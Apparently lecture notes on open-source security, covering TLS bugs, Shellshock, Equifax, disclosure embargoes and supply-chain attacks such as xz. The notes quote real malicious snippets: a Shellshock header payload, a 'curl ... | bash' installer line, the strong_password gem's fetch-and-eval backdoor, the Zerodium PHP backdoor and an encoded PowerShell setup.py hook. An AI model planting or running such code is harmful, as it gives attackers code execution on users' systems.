Open-Source Security
Is open source more secure because more people look at the code? Or less
secure, because bad guys can look at the code and find bugs?
This question has been debated for quite some time. For a while,
so-called "fuzzing" techniques (for generating random input) did work
better when the source was available: the user would examine the source
and generate input until all the edge cases were triggered. The goal was
to execute every part of the code.
But then that changed: tools were developed that could do this given only
the object code. At that point, having the source was no longer a
liability. A large number of Windows exploits started to appear.
On the other hand, the truth is that not everybody looks at the
code. In most cases, not very many do.
TLS, for Transport Layer Security, is an encryption layer used above TCP
(or UDP). It is what creates the 's' in https, for secure
http.
Three issues
First, the software can have bugs. Perhaps this is more likely for Open
Source because of fewer development resources, though that is hard to say.
Second, repositories can be compromised. This, too, can happen with
commercial software, but Open Source does seem to be at least a little
more prone to this.
Finally, it is easy for users to fall behind on upgrading. If you're
installing an e-commerce package from Microsoft, then Microsoft will make
sure it gets updated. However, if you're building your own e-commerce
package from a dozen separate open-source projects, then it's your job to
update them all. It's easy to forget.
These issues completely ignore the question of how many users actually
look at the code in their open-source packages, or whether it's easier to
figure out vulns once you hear vaguely of a problem with a certain
project.
It remains true that Open Source projects are easier to trust. Even
software from Microsoft is often tracking you or selling you something.
Debian OpenSSL bug
At some point (probably 2006), Debian removed a couple lines from the
Debian copy of OpenSSL because the lines generated complaints from
code-analysis software. Here's the code as of today, from boinc.berkeley.edu/android-boinc/libssl/crypto/rand/md_rand.c;
the function is static void ssleay_rand_add(const
void *buf, int num, double add). The variable m is a pointer to a
certain structure. The call to MD_Update() itself is actually a macro:
#define MD_Update(a,b,c) EVP_DigestUpdate(a,b,c)
The variable m is a pointer to a certain structure. Here is part of the
code:
for (i=0; i<num; i+=MD_DIGEST_LENGTH)
{
j=(num-i);
j=(j > MD_DIGEST_LENGTH)?MD_DIGEST_LENGTH:j;
MD_Init(&m);
MD_Update(&m,local_md,MD_DIGEST_LENGTH);
k=(st_idx+j)-STATE_SIZE;
if (k > 0)
{
MD_Update(&m,&(state[st_idx]),j-k);
MD_Update(&m,&(state[0]),k);
}
else
MD_Update(&m,&(state[st_idx]),j);
/* DO NOT REMOVE THE FOLLOWING CALL TO MD_Update()! */
MD_Update(&m,buf,j);
/* We know that line may cause programs such as
purify and valgrind to complain about use of
uninitialized data. The problem is not, it's
with the caller. Removing that line will make
sure you get really bad randomness and thereby
other problems such as very insecure keys. */
MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
MD_Final(&m,local_md);
md_c[1]++;
buf=(const char *)buf + j;
for (k=0; k<j; k++)
{
/* Parallel threads may interfere with this,
* but always each byte of the new state is
* the XOR of some previous value of its
* and local_md (itermediate values may be lost).
* Alway using locking could hurt performance more
* than necessary given that conflicts occur only
* when the total seeding is longer than the random
* state. */
state[st_idx++]^=local_md[k];
if (st_idx >= STATE_SIZE)
st_idx=0;
}
}
The code-analysis software thought the repeated calls (this is inside a
loop) to MD_Update(&m,buf,j) made use of uninitialized data.
This may actually have been the case, in that perhaps some
entropy was indeed supposed to come from the uninitialized data. The code
does look odd, though, from a deterministic point of view.
Still, the point of the repeated calls to MD_Update() was to generate
additional randomness.
Commenting out the call to MD_Update(&m,buf,j) greatly reduced the
total available entropy. Supposedly the entropy now came from a single
16-bit number. This really breaks the random-number
generator.
Debian discovered and fixed the error in 2008.
Apple TLS bug
Here is the source code (Apple has open-sourced a lot of OS X, but not
the GUI parts of it):
static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
uint8_t *signature, UInt16 signatureLen)
{
OSStatus err;
...
if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
goto fail;
if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
goto fail;
goto fail;
if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
goto fail;
...
err = sslRawVerify();
...
fail:
SSLFreeBuffer(&signedHashes);
SSLFreeBuffer(&hashCtx);
return err;
}
Note the duplicated "goto fail".
Note the lack of enclosing {}. Despite the appearances of the indentation,
the second goto fail is thus
always executed. The call to SSLVerifySignedServerKeyExchange()
always jumps to fail. But most likely we still have err==0 at this point
(because none of the err != 0 checks actually succeeded), and so the
connection is verified even if there was a certificate mismatch.
It's times like this that it is really handy to have the
compiler doing dead-code detection. Fail.
Ok, nobody was looking at the Apple source here outside of Apple.
OpenTLS bug
As the Debian and Apple issues above show, anyone can introduce TLS bugs.
But the "heartbleed" bug was clearly related to the relatively modest
development resources available to the OpenSSL foundation.
Most servers used OpenSSL, officially OpenTLS. TLS contains a heartbeat
provision: the client sends occasional "heartbeat request" packets and the
server is supposed to echo them back, exactly as is. This keeps the
connection from timing out. That is, the client sends a (len,data)
pair, and the server is supposed to echo back that much data. Part of the
reason for echoing back data is so the client can figure out which request
triggered a given response. It might make the most sense for the client
request data to represent consecutive integers: "0", "1", ..., "10", "11",
"12", ....
The problem is that the client can lie: the client can send a request in
which len ≠ data.length. If
len < data.length,
this is harmless; just the first len
bytes of data get sent back.
But what happens if len >
data.length, and the server sends back len
bytes? In this case the server would try to send too much back. In a
sensible language, this would result in an array-bounds exception for
data. In C, however, the result is the grabbing of a random chunk of
memory beyond data. Suppose
a sneaky client sent, say, a 3-byte payload, but declared the
payload length (the value of len)
as, say, 1000 bytes. The server now sends back 997 bytes of general heap
memory, which may contain interesting content. Unpredictable, but
interesting.
Here is the original code, from tls1_process_heartbeat(SSL * s). The
variable payload represents
the length of the heartbeat payload.
n2s(p, payload); // extract value of payload (the length)
pl = p;
...
if (hbtype == TLS1_HB_REQUEST)
{
unsigned char *buffer, *bp;
int r;
/* Allocate memory for the response, size is 1 bytes
* message type, plus 2 bytes payload length, plus
* payload, plus padding
*/
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;
/* Enter response type, length and copy payload */
*bp++ = TLS1_HB_RESPONSE;
s2n(payload, bp);
memcpy(bp, pl, payload); // pld: copy payload bytes from pointer pl to pointer bp (=buffer, above)
bp += payload;
/* Random padding */
RAND_pseudo_bytes(bp, padding);
r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
if (r >= 0 && s->msg_callback) // pld: this will get moved
s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
buffer, 3 + payload + padding,
s, s->msg_callback_arg);
OPENSSL_free(buffer);
if (r < 0)
return r;
}
There is no check here that the value of payload, the declared
length of the payload, matches the actual length of the payload.
Here is the fix:
if (hbtype == TLS1_HB_REQUEST)
{
unsigned char *buffer, *bp;
int r;
/* Allocate memory for the response, size is 1 bytes
* message type, plus 2 bytes payload length, plus
* payload, plus padding
*/
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;
/* Enter response type, length and copy payload */
*bp++ = TLS1_HB_RESPONSE;
s2n(payload, bp);
if (r >= 0 && s->msg_callback) // this got moved, so it always executes even if one of the returns below is made
s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
buffer, 3 + payload + padding,
s, s->msg_callback_arg);
if (1+2+16 > s->s3->rrec.length) // check if actual payload length > 0!
return 0;
memcpy(bp, pl, payload); // copy payload bytes from pointer pl to pointer bp (=buffer, above)
if (1+2+payload+16 > s->s3->rrec.length) // check if actual payload length is longer than declared length
return 0; // RFC 6520 section 4 says to silently discard
bp += payload;
/* Random padding */
RAND_pseudo_bytes(bp, padding);
r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
OPENSSL_free(buffer);
if (r < 0)
return r;
}
Google reported the bug to the OpenSSL Foundation on April 1, 2014. It is
estimated that somewhere between 15 and 60% of sites using SSL were
affected.
The bug is now fixed. Nobody knows how much it was exploited.
The more interesting question might be why OpenSSL didn't get more
attention before. There were people outside the OpenTLS
Foundation looking at the code, but none of them noticed Heartbleed.
Ultimately, the problem was that OpenTLS was severely underfunded. The
president of the OpenSSL foundation is (or was, in 2014; he's since left)
Steve Marquess. In a blog
post after Heartbleed, he described himself as the fundraiser. The
OpenSSL foundation received $2,000/year in donations, and also did some
support consulting (the latter earned a lot more).
In the week after Heartbleed, the OpenSSL foundation received $9,000,
mostly in small donations from individuals. Not from the big corporate
users of OpenSSL.
The foundation has one paid employee, Stephen Henson, who has a PhD in
graph theory. He is not paid a lot. Before Steve M created the OpenSSL
foundation, Steve H's income has been estimated at $20K/year. (The
heartbleed error was not his.)
Despite the low level of funding, though, in the eight (or more) years
before Heartbleed the OpenSSL Foundation was actively seeking
certification under the NIST Cryptographic
Module Validation Program. They understood completely that
cryptography needs outsider audits.
As of 2014, at least, the two Steves had never met face-to-face. Like
Steve M, Steve Henson moved on to other projects in 2017.
A month after the bug's announcement, the Linux Foundation announced that
it was setting up the Core
Infrastructure Initiative. They lined up backing from Google, IBM,
Facebook, Intel, Amazon and Microsoft. The first project on the agenda was
OpenSSL, and its struggle to gain certification from the US government.
In 2015 a formal audit of OpenSSL was funded, by the Open Crypto Audit
Project, opencryptoaudit.org.
That audit has now been completed; a 2016 status report is at icmconference.org/wp-content/uploads/G12b-White.pdf.
Here is a report of a later audit: ostif.org/the-ostif-and-quarkslab-audit-of-openssl-is-complete.
As of 2016, Black Duck reported that 10% of the applications they tested
were still vulnerable to Heartbleed, 1.5 years after the revelation (info.blackducksoftware.com/rs/872-OLS-526/images/OSSAReportFINAL.pdf).
See also the Buzzfeed article "The
internet is being protected by two guys named Steve".
More Open-Source Security Issues
Magento
Magento is an e-commerce platform
owned by Adobe. It is described as having an "open-source ecosystem". It is
available on github at github.com/magento.
I assume that is the "community edition"; there is also an "enterprise
edition".
A vulnerability was announced in April 2017 by DefenseCode LLC, six
months after it was reported privately to Magento. Magento did not respond
directly to DefenseCode. The vulnerability "could" lead to remote code
execution, though there are some additional steps to get that to work, and
it was not clear whether that actually happened in the wild. See www.defensecode.com/advisories/DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf.
If a site adds a link to a product video stored remotely on Vimeo, the
software automatically requests a preview image. If the file requested is
not in fact an image file, Magento will log a warning message, but it will
still download the file. The idea is to trick Magento into downloading an
executable file, eg a .php file. An updated .htaccess
file also needs to be downloaded, but once the basic file-download idea is
working this is not difficult. Because of the way files are stored, the
.php file should begin with ".h", so the .htaccess file ends up in the
same directory.
Parts of the strategy also involve cross-site request forgeries (CSRF)
against someone with Magento management privileges at the target site.
Even low-level privileges are sufficient. There are numerous strategies
for trying to get someone to click on a suitable link; none of them are
sure bets.
Magento's failure to respond more aggressively to DefenseCode was
puzzling. This seems less likely in a "true" open-source project.
As of 2018, Magento was still running into security issues, often related
to brute-force attacks on administrative passwords, which were often not
well-configured. Magento is an attractive target, as it is an e-commerce
front-end, and as a result a large number of credit-card transactions flow
through it.
Also in 2018, open-source security firm Black Duck sold for half a
billion.
Equifax
In August 2017 credit-reporting company Equifax discovered that personal
records on 140 million US people had been exfiltrated. The actual
vulnerability was in Apache Struts 2, which is a
framework for developing Java server-side web applications. It extends the
Java Servlet API. Struts has a history of serious vulnerabilities. The
vulnerability in question was CVE-2017-5638,
which allows for remote code execution.
Equifax was notified of the issue in March 2017. They looked, but could
not find a place on their site where Struts was being used! The
vulnerability went unpatched, even as it was being routinely exploited in
the wild.
Making sure tools and frameworks are updated is tedious work. Something
like Struts can be buried in the archives of a project that was largely
completed years ago. Ultimately, the attackers found a flaw in a very old
package known as the Automated Consumer Interview System.
In 2020, the FBI announced charges against four Chinese nationals who
they believe developed the attack.
A more detailed analysis is at blog.0x7d0.dev/history/how-equifax-was-breached-in-2017.
That report attributes the breach to these factors:
- Insufficient knowledge of their legacy systems.
- Poor password storage practices.
- Lack of rigor in the patching process.
- Lack of network segmentation.
- Lack of Host-Based Intrusion Detection System (HIDS)
- Lack of alerting when security tools fail.
Equifax was negligent, in that they missed some things, but it is hard
to say they were glaringly negligent.
The Chinese probably use the information to identify people who are
under significant financial stress, and who may be vulnerable to
bribery.
Shellshock
This is the bug that was in bash that allowed very easy remote code
execution. It was discovered and fixed in 2014. The problem is that the
act of setting an environment variable -- normally benign -- could be
tricked so as to execute a shell script as well, if the environment
variable began with a shell function definition.
The shell maintains the environment as a list of (name,value)
pairs. Specifically, we can assign an environment variable as follows:
FOO=here_is_my_string
echo $FOO
We can also assign shell functions, eg with
FN() { echo hello;}
(the space before "echo" is significant). Prior to Shellshock, this would
be stored in the environment as the pair (FN, "() { echo hello;}").(You
can list bash functions with typeset
-F, and see the entire environment with env.)
The problem was that one could sneak a command following the
function definition, and it would be executed at the time the
environment variable was set:
FN() { echo hello;}; echo
"hello world!"
(The command, in red here, is not actually part of the function.) This is
due to a mistake in recognizing the end of the function
body. The above looks to older versions of bash like the following
environment-variable assignment, followed by a command.
FN='{ echo hello;}; echo "hello world!"'
Whenever this definition is executed (eg at the time
it is made, and whenever the environment is passed to a new process), the
'echo "hello world!"' command would go along for the ride. The core
problem here occurs with shell variables that begin with '()'; normal
shell-variable strings do not result in command execution. That is,
assigning a variable FN2='echo "hello world"' would not
result in executing the command; nor would FN3="foo"; echo "hello world"
(though when done for the first time the FN3 example would echo
"hello world" once).
This is most of the problem. The other part is that web servers, and
quite a range of other software, routinely accept strings from clients
that they then turn into environment variables. For example, if the client
sends the following GET request to the server (from blog.cloudflare.com/inside-shellshock):
GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com
then the server turns it into the following environment
settings (before executing the GET request):
HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com
The server does this so that a cgi script on the server will have access
to these values, through its environment. However, because of the bug,
setting environment variables can lead to code execution!
Now, if the client instead sent the following text as User-Agent (there
is no actual "string" here, in fact):
User-Agent:
() { :; }; /bin/eject
Then the command /bin/eject
would be executed on the server. (As for the shell function, ":" is the
bash null command; the legal function part is
() { :; };.
A consequence of the patch is that bash functions are no longer stored in
the environment at all. (This wouldn't strictly have been necessary, but
it probably was a good idea.)
Meltdown and Spectre
The Meltdown and Spectre vulnerabilities affect Intel CPUs; Intel
open-sources nothing about its processors. But open-source operating
systems still had to create patches.
The problem is that open-source patches had to be created while there was
still a news embargo on the details of the vulnerability, lest miscreants
get a leg up on exploiting them.
Meltdown and Spectre were discovered in the summer of 2017 by Jann Horn
of Google, Werner Haas and Thomas Prescher from Cyberus Technology, and
Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz from Cyberus
Technology. The discoverers informed Intel, and all agreed to announce the
flaw only once there was a fix in place.
In November 2017, Alex Ionescu noticed an upgrade to Windows 10 that made
the CPU run slower, with no obvious benefit. He suspected this was a
vulnerability patch.
On Wednesday January 3, there were new commits to the Linux kernel.
Observers quickly noticed that the commits didn't seem to make sense, from
a performance perspective. Rampant speculation that they were related to a
hardware vulnerability led to the announcement of Spectre and Meltdown on
that date. The scheduled release/announcement date was to be January 9,
Microsoft's "Patch Tuesday".
Still, the Linux community by and large did abide by the embargo rules.
This is complicated, because it means not using the public
discussion system that has been put in place. It also means not
releasing important security fixes until the embargo is ended.
The head of OpenBSD, Theo de Raadt was extremely vexed, as OpenBSD was not
given advanced warning:
Only Tier-1 companies received advance
information, and that is not responsible disclosure – it is selective
disclosure.... Everyone below Tier-1 has just gotten screwed.
De Raadt also argued that, while Spectre might be considered an
unforeseen bug, the issues behind Meltdown were long understood to at
least some degree. Intel decided to go ahead with their
speculative-execution design anyway, in order to beat the competition.
OpenBSD did announce a fix before the end of the embargo for the Wi-Fi
Krack vulnerability of October 2017. The theory at that time was that
OpenBSD would therefore not be given advance warning of the next
vulnerability. But several other smaller OS vendors (Joyent, SmartOS) also
were not told about Meltdown/Spectre in advance.
Still, there is a real problem: to abide by embargo rules means
sitting on a fix, knowing your users might be being attacked. It
means your source is, until the embargo ends, no longer "open".
Windows Security
Windows systems are quite hard to secure, partly because there are so
many files that are not well-understood within the security community, and
partly because of the registry.
Licensing rules don't help. If you want to verify the SHA-3 checksum of
every file, for example, you pretty much have to boot off a clean
bootfile. Otherwise, malware that has made it into the kernel can make it
seem that all files are unchanged. However, in Windows, a separate boot
device technically requires a separate license. And in practice making a
bootable Windows USB drive is not easy, without paying for a separate
license.
Cryptography Software
It is certainly reasonable to think of commercial software as reliable.
After all, one can read the reviews, and a company couldn't stay in
business if it didn't keep its users happy. If the software doesn't work
properly, won't users know?
If the software is a word processor, and it keeps crashing, or failing to
format text properly, the failure is obvious. If the software does complex
engineering calculations, that's harder to detect, but usually users do at
least a little testing of their own.
But if closed-source software does encryption, it is almost
impossible to verify that it was done correctly. Just what random-number
algorithm was used? Was the AES encryption done properly? (If it was not,
then the problem becomes very clear if the software is sending
encrypted content to an independent decryption program, but this is often
not the case. Lots of times, the same program is used to encrypt files and
then later to decrypt them, in which case an algorithm with a security
flaw is almost undetectable.) Was the encryption done first, followed by
the authentication hash (HMAC), or was it the other way around? Doing it
the first way is much safer, as the HMAC then provides no information
about whether brute-force decryption is on the right track.
For reasons like this, some commercial encryption software is audited.
But usually it is not. The bottom line is that commercial crypto is hard
to trust.
Sometimes open-source isn't audited either. But it's hard to find out.
And even with OpenSSL, people outside the OpenSSL foundation were looking
at the basics of encryption, to make sure it looked ok.
Software Trust
Whatever one can say about open-source reliability (which, in general, is
comparable to commercial-software reliability), open source wins the trust
issue hands down. Once upon a time, most software was trustworthy, in that
you could be reasonably sure the software was not spying on you. Those
days are gone. Most Android apps spy, to some degree or another, on the
user. Microsoft Office appears not to, but Windows 10 sends quite a bit of
information back to Microsoft (some of this can be disabled through
careful configuration).
Spyware is almost unknown, however, in the open-source world. Ubuntu has
a search feature, that returns some information to Canonical, but that's
reasonably up-front. Firefox often asks to send crash reports, but, again,
that's open. The reasons open-source spyware is so rare are:
- users intensely dislike it
- it is usually easy to find in the source code attempts to
create new network connections that exfiltrate data back to the
mothership
Ironically, "free" software that is not open-source is usually
spyware: "if you're not paying for the product, you are the
product". Most non-open-source browser add-ons, in particular, are
spyware. Many Android apps are spyware; flashlight apps are notorious.
Open-source trust is not always quite straightforward. Firefox, for
example, is the browser with the most privacy-protection features, hands
down. A version of Firefox is the basis for the Tor browser. That said,
many Firefox privacy features are disabled by default, because some
commercial sources of Firefox funding have had concerns.
SourceForge (and Gimp)
SourceForge is a popular alternative to GitHub for open-source projects.
GitHub makes money selling space for non-public projects (public projects
are free). SourceForge sold banner advertisements, and in 2013 started a
"bundleware" program in which a user who downloaded a program or source
tree would optionally receive a second download. The second download was
selected by default, though users could unselect it. SourceForge is often
used to distribute binaries, so this bundleware issue was not
easily avoided once the download started.
The problem was that the second downloaded package, a paid installation,
often involved malware. At a minimum, spyware was common. Another common
feature was advertisements that were allowed to contain a large DOWNLOAD
button.
The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was
still distributing Gimp binaries (as an "abandoned" project), and bundling
them with malware. This did not go over well with the Gimp team.
How can an open-source project protect itself against malicious
distribution? What happens when a project is completely abandoned? What
happens when a project simply moves elsewhere?
In 2016 the bundleware program was ended, as new owners took control.
Generally speaking, the actual open-source repositories weren't usually
tampered with, though the Gimp case might be an exception.
Tampered or Trojaned Repositories
These are also sometimes called software "supply chain" attacks.
In 2003, the main Linux repository was still on BitKeeper, but they
maintained separate mirror repository running CVS. One day a patch
appeared in the CVS image in the code for the wait4()
call:
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
That last '=' on the first line is an assignment, not a comparison.
Setting uid to 0 gives the process root privileges. Inside a syscall, that
is legal.
This patch never made it back to the main BitKeeper repo, and it was
pretty obvious from the beginning as it was the only file on the CVS
mirror that didn't have a link back to BitKeeper, but nobody knows how it
got there. See lwn.net/Articles/57135.
There was a break-in at kernel.org in 2011. It is not certain that no
kernel files were briefly modified, though the rigorous checksumming
process would have made that difficult.. Donald Austin was arrested for
the breach, in Florida, in 2016.
In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package
was modified to contain malware.
In June 2018, hackers took over a Gentoo mirror account on github and
installed file-deleting malware. Gentoo suffered at least one earlier such
attack, in 2010.
In July 2018, three packages on the Arch User Repository were infected
with malware, including acroread (Adobe Acrobat Reader). Acroread isn't
open-source, but it's trivial to install a one-line attack in the
installation script:
curl -s https://badware.ly/stuff.sh | bash &
The AUR is not the same as the Arch distribution itself, but
distinctions like this are sometimes hard to keep track of.
In an Aug 7, 2018 blog post, Eric Holmes describes how he gained commit
access to Homebrew using credentials he found on the site. See medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab.
Homebrew is a package manager for macs, though it also works well under
Linux.
I'm harvesting credit card numbers and passwords from your site. Here's
how.
This was a 2018 warning post by David Gilbertson (david-gilbertson.medium.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5),
who was not actually doing this, but wanted to point out how
easy it was. Gilbertson discusses several standard countermeasures, and
describes how they are close to useless.
Webmin
There was also a 2018 attack to Webmin,
a system-administration tool, in which password_change.cgi was modified.
See www.webmin.com/exploit.html
for details. The attack affected the code on the build server, but
apparently not the Github repository. Still, the vulnerable code
was widely distributed. Most users, for example, installed the Debian or
RPM pre-compiled package.
Ruby strong_password gem
In June 2019 the Ruby strong_password
gem (Ruby's name for library), version 0.0.7, was hijacked.
See withatwist.dev/strong-password-rubygem-hijacked.html
Here's the crucial code:
Thread.new {
loop {
_!{
sleep rand * 3333;
eval(
Net::HTTP.get(
URI('https://pastebin.com/raw/xa456PFt')
)
)
}
}
} if Rails.env[0] == "p"
This:
- starts a new thread
- after sleeping 3333 seconds (an hour is 3600 seconds)
- retrieves code from pastebin.com
- executes it
- wrapped in an empty exception handler, so you won't see errors (pld:
I'm not sure about this, but maybe _!
does this)
- only if Ruby is running in production mode (making
it harder to observe via testing)
This happened in March 2019 with a different Ruby package: zdnet.com/article/backdoor-code-found-in-popular-bootstrap-sass-ruby-library.
In both cases, the github.com source was unchanged; the distribution at
rubygems.org was what was compromised.
There were multiple related vulnerabilities discovered in August 2019: github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019
There's also the VestaCP admin interface, and a python package Colourama.
Consider building from source for production versions!
Decompress
A vulnerability in the open-source file-compression utility decompress
was discovered in 2020. The problem is that, while decompressing, it could
overwrite files such as ../../../etc/passwd (or, for that matter,
./foo/bar/../../../../../etc/passwd). This is a very old idea, but it
keeps coming up. It is surprisingly hard to validate legitimate relative
paths.
PyYAML
YAML is a data-serialization format, not unlike JSON. PyYAML unpacks YAML
data. Alas, it could be tricked, in a bug discovered in 2020, into running
arbitrary constructors (and thus arbitrary code) when deserializing data.
(The pickle library, the standard Python serialization mechanism, had the
same issue a few years earlier.)
Lodash
This is a javascript library that supports a range of common utility
functions. It is used in over ~4 million projects on Github alone. A vuln
discovered in 2019 involved "prototype pollution", eg
modification of Object-level standard methods through introduction of new
child classes.
Octopus
The Octopus scanner was malware on Github that tried to infect other
repositories, through the use of a Netbeans issue. It was discovered in
Spring 2020. Once a Netbeans installation was infected, every .jar file
built with that installation would also carry the infection. See securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain.
Zerodium
In March 2021 it was discovered that an update to PHP contained a
backdoor. If a website used the compromised PHP, someone could execute
arbitrary code through the use of the password "zerodium". The PHP code
was on a private git server git.php.net. It looks like the server itself
was compromised; the malicious code appeared to have been uploaded by two
trusted PHP maintainers (who were not in fact involved).
There is in fact a security company named Zerodium, but they were not
related.
The added code looked something like this (bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code):
convert_to_string(enc);
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
zend_try {
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS:
sold to zerodium, mid 2017");
The idea was that if your User-Agent HTTP header string began with
"zerodium", then the rest of the string would be executed. That
"REMOVETHIS" string is just what gets inserted in the logfiles.
npm colors and faker
libraries
Npm (Node.js Package Manager) is a large open repository for javascript
tools. The colors and faker libraries were legit tools that appeared to
have been corrupted by a malicious attacker in January 2022.
Alas, the real situation turned out to be somewhat more complicated:
package developer Marak Squires was simply really mad at big
corporations using his packages without contributing any support. From www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps:
The reason behind this mischief on the
developer's part appears to be retaliation—against
mega-corporations and commercial consumers of open-source projects
who extensively rely on cost-free and community-powered software but do
not, according to the developer, give back to the community.
In November 2020, Marak had warned that he
will no longer be supporting the big corporations with his "free work"
and that commercial entities should consider either forking the projects
or compensating the dev with a yearly "six figure" salary.
This is a complicated development. Most open-source maintainers, while
sympathetic, ultimately decided this was a terrible idea.
PyPi
This is the Python Package Index. Everybody uses it.
FastAPI is a Python framework with a long history. In March 2022,
legitimate package fastapi-toolkit
was added. In November 2022, a commit with a malicious backdoor was
accepted. It was detected. When incorporated into a web project, the
backdoor allows an external attacker to run arbitrary Python, and make
arbitrary SQL queries (including writes) using a specially crafted HTTP
header. See securitylabs.datadoghq.com/articles/malicious-pypi-package-fastapi-toolkit.
In February 2023, the Phylum team
discovered over two thousand new packages that, while not necessarily
malicious themselves, all contained the following code in the setup.py
file:
if not
os.path.exists('tahg'): # basically never
exists
subprocess.Popen('powershell
-WindowStyle Hidden -EncodedCommand
cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB...AGMAaABlAC4AZQB4AGUAIgA=',
shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
except: pass
So
to install this package is to run that mysterious base64-encoded
executable. See blog.phylum.io/phylum-discovers-another-attack-on-pypi.
100,000
infected Github repositories
Beginning
in late 2023, a malware group started a large-scale project to
fork
popular Github repositories
- infect them with malware
- put them back on Github with a very
similar name
No one is quite sure how many malicious repos there are, but 100,000 or
so have been identified. Identification is based on the
automated clone process; manual malicious clones are not detected. The
project name itself is the original one (eg numpy).
Many of the malicious github clones are based on the PyPi packages above.
See apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack.
There is an animated gif there, showing an exec() of a malicious string
tabbed over way to the right.
PyTorch
Here's a discussion of how a White Hat team figured out how to attach
malicious software to PyTorch, the machine-learning front end.
Our exploit path resulted in the ability to
upload malicious PyTorch releases to GitHub, upload releases to AWS,
potentially add code to the main repository branch, backdoor PyTorch
dependencies – the list goes on. In short, it was bad. Quite bad.
Github allows code to be executed as part of pull requests; this feature
is called Github Actions. This makes great sense for testing, but running
untrusted code is a problem.
johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch.
Google Search can be dangerous
Brian Krebs has written about how hard it can be to find well-known free
software packages using Google. The bad guys have not only created similar
websites, but in some cases they have paid Google to elevate their sites
in the search rankings. See https://krebsonsecurity.com/2024/01/using-google-search-to-find-software-can-be-risky.
The situation is just as bad with open-source packages intended for
developers. See www.csoonline.com/article/654560/why-open-source-software-supply-chain-attacks-have-tripled-in-a-year.html
and www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages.
2024 xz vulnerability
A serious supply-chain attack on ssh was published on March 29, 2024, by
Andres Freund, who discovered it by noting an unexpected increase in the
cpu usage of ssh.
Ssh, or Secure SHell, is the standard encrypting way
of logging into remote machines. Like most encryption software, it
compresses its data first, to reduce the feasibility of "known-plaintext"
attacks. It uses the xz compression library, maintained by Lasse Collin
(who is blameless here).
Here is a discussion of the attack itself:
research.swtch.com/xz-script.
Perhaps the most interesting technical part of the attack is how the
malicious payload is concealed. xz has always had a test directory of
random data; this is compressed and then the result is checked against
what it was supposed to be. The attackers introduced a binary malicious
payload into the test data! The standard configure script runs an m4
(well-known macro package) script, which (in a non-obvious way) extracts
this binary payload and runs it, at a specified point. When ssh calls xz
on certain data (the key provided by the attacker), the payload enables
remote command execution.
But how did the xz project get compromised? This is
in many ways the more interesting part. See
research.swtch.com/xz-timeline.
The package dates from 2004 (ssh is much older, but started to use xz
later). In October 2021,
Jia Tan appears on the xz mailing list,
and sends his first patch. He sends more. He gives every appearance of
someone interested in helping the xz package move forward. I have put his
name in italics because it appears this is not a real name.
In April 2022, Jigar Kumar emails the list
complaining that the Tan patches have not been incorporated.
Then Denis Ens similarly emails to complain about the Java
version. Kumar continues to pressure Collin about how this
project is just way behind, and that Collin needs to pick up the pace.
(This sort of abuse is common enough in open source.) In June, Collin
writes this:
I haven't lost interest but my ability to care has been fairly limited
mostly due to longterm mental health issues but also due to some other
things. Recently I've worked off-list a bit with Jia Tan on XZ Utils and
perhaps he will have a bigger role in the future, we'll see. It's also
good to keep in mind that this is an unpaid hobby project.
Soon enough, Collin bows to the pressure and Tan
becomes a maintainer. But Tan takes his time, building more
trust; the actual attack isn't loaded until March 9, 2024.
It is tempting to suspect that this is a nation-state
project, due to the two-year timeline. That takes patience. But there are
some things to suggest that maybe not. The Tan and Kumar
emails have similar formats: Tan is JiaT575 and Kumar
is similar. And while the obfuscation technique is ingenious, there were
some minor problems with the payload.
The article at
doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
suggests that was really being backdoored was systemd, the master process
launcher. I'm not quite convinced, but systemd does start sshd, and does
have waay too many dependencies.
Finally, if you cloned the package from git and built
it yourself, the bug would not be there. You had to be building for a
deb/rpm package distribution.
Thompson Backdoor
Ken Thompson is one of the original developers of Unix. In his 1983
